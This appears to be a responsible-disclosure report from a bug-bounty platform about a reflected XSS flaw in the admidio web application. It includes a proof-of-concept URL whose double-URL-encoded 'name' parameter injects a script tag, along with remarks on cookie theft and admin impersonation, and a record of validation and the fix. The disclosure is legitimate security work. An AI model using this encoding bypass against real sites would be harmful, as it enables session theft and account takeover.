Cross-site Scripting (XSS) - Reflected in admidio/admidio

Valid

Reported on

Oct 18th 2021


Description

Possible to perform reflected XSS by using double URL encoding when retrieving files

Proof of Concept

Trigger XSS via

http://10.0.2.15/admidio/adm_program/modules/documents-files/documents_files_function.php?mode=6&folder_id=1&name=%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2531%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e

Impact

Possible trick admin users to visit the malicious link, executing the XSS and allowing cookies to be stolen, it is also possible to execute actions as admin user via malicious Javascript.

Occurrences

html sanitisation should be done after all input has been transformed

We have contacted a member of the admidio team and are waiting to hear back a year ago
haxatron modified the report
a year ago
Markus Faßbender validated this vulnerability a year ago
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Markus Faßbender confirmed that a fix has been merged on 01a83d a year ago
Markus Faßbender has been awarded the fix bounty
to join this conversation